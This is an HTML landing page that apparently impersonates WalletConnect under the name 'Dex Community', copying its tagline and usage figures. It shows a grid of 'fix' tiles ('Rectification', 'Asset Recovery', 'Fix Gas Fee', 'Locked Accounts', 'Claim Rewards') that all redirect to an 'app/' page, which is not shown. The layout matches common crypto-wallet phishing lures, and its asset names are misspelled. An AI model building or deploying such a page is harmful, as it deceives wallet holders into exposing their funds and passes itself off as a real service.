<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="apple-touch-icon" sizes="180x180" href="favicon_io/apple-touch-icon.png" />
    <link rel="icon" type="image/png" sizes="32x32" href="favicon_io/favicon-32x32.png" />
    <link rel="icon" type="image/png" sizes="16x16" href="favicon_io/favicon-16x16.png" />
    <link rel="manifest" href="./favicon_io/site.webmanifest" />
    <title>Dex Community</title>
    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-wEmeIV1mKuiNpC+IOBjI7aAzPcEZeedi5yW5f2yOq55WWLwNGmvvx4Um1vskeMj0" crossorigin="anonymous" />
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script src="https://kit.fontawesome.com/50b3f375f9.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="./assets/css/new.css" />
</head>
 
<body>
    <div class="main-body">
        <navbar class="navbar sticky-top">
            <div class="nav-items">
                <div class="nav-logo">
                    <a href="./" class="logo-img"><img src="./assets/images/files/lugu-welet.svg" alt=""
                            class="img-fluid"></a>
                </div>
                <div class="nav-links">
                    <p> <a href="./app/">Products</a> </p>
                    <p><a href="./"> Docs</a></p>
                    <p><a href="./app/"> Explorer</a></p>
                </div>
            </div>
            <div class="nav-buttons">
                <button type="button" class="btn btn-md btn-secondary connectButton">Dashboard</button>
            </div>

        </navbar>

        <div class="main-hero">
            <div class="hero-text">
                <div class="hero-logo">
                    <img src="assets/images/files/hero-logo.svg" alt="" class="img-fluid">
                </div>
                <h1>Connecting web3</h1>
                <p>The communications protocol for web3, WalletConnect brings the ecosystem together by enabling wallets
                    and apps to securely connect and interact.</p>
                <div class="hero-buttons">
                    <button type="button" onclick="myLink()" class="btn btn-md btn-primary ">Learn More </button>
                    <button type="button" onclick="myLink()" class="btn btn-md btn-secondary ">Explore Wallets & Apps </button>
                </div>
            </div>
        </div>

        <div class="sub-hero">
            <ul>
                <li>
                    <div class="sub-text">
                        <h5>Total Connections</h5>
                        <p>1,107,304,399</p>
                        <h6>per day</h6>

                    </div>
                </li>

                <li>
                    <div class="sub-text">
                        <h5>Active</h5>
                        <p>887,924</p>
                        <h6>currently</h6>

                    </div>
                </li>

                <li>
                    <div class="sub-text">
                        <h5>Messages</h5>
                        <p>24,761</p>
                        <h6>per second</h6>

                    </div>
                </li>

                <li>
                    <div class="sub-text">
                        <h5>Wallets</h5>
                        <p>170+ </p>
                        <h6>integrated</h6>
                    </div>
                </li>


                <li>
                    <div class="sub-text">
                        <h5>Apps</h5>
                        <p>450+ </p>
                        <h6>integrated</h6>
                    </div>
                </li>
            </ul>
        </div>

        <div class="section-validate">
            <div class="validate-section">
                <div class="container-lg container-fluid">
                    <div class="row">
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/stake.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Staking/Unstaking</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/data-migration.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Migration V2</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/distributed.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Connect Wallet</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/giveaway.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Giveaway</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/approved.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Whitelist</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/verify.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>K.Y.C</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/shopping-cart.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Buy NFT</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/marketplace.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Marketplace</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/claim.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Claim Rewards</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/security.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Rectification</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/growth.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Pre-sale</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/gas.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Fix Gas Fee</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/recovery.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Asset Recovery</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/migration.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Migrate</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/network.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Mainnet</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/browser.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Mint NFTs</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/locked.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Locked Accounts</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/exchange.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Swaps/Exchange</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/chain.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Cross Chain Transfer</p>
                                    </div>
                                </div>
                            </div>
                        </div>
    
                        <div class="col-lg-3 col-md-4 col-sm-6 col-6">
                            <div class="validate-box">
                                <div class="box-container">
                                    <div class="box-icon">
                                        <img src="./assets/images/icons/system.png" alt="" class="img-fluid" />
                                    </div>
                                    <div class="box-content">
                                        <p>Slippage Error</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="section-one">
            <h1>We make it easy for you to plug into web3.</h1>
            <div class="image-section">
                <img src="./assets/images/files/section-one-img.jpeg" alt="" class="img-fluid">
            </div>
        </div>

        <div class="section-two">
            <h1>With WalletConnect, you can connect your wallet with hundreds of apps, opening the doors to a new world
                of web3 experiences.</h1>
            <div class="image-section">
                <img src="./assets/images/files/c-w.png" alt="" class="img-fluid">
            </div>
        </div>

        <div class="section-two">
            <h1>Looking for a wallet?</h1>
            <div class="image-section">
                <img src="./assets/images/files/luking-wellet.png" alt="" class="img-fluid">
            </div>
        </div>

        <div class="section-two">
            <h1>Want to connect with an app?</h1>
            <div class="image-section">
                <img src="./assets/images/files/w-c.png" alt="" class="img-fluid">
            </div>
        </div>

        <div class="footer-section">
            <img src="./assets/images/files/futer-c.png" alt="" class="img-fluid">
        </div>
    </div>
</body>

</html>

 
<script>
    function myLink() {
        window.location.href = 'app/';
    }
</script>

<script>
    $(document).ready(function () {
        // Get the modal
        $(".validate-box").click(function () {
            window.open('app/', '_self');
        });
    });
</script>
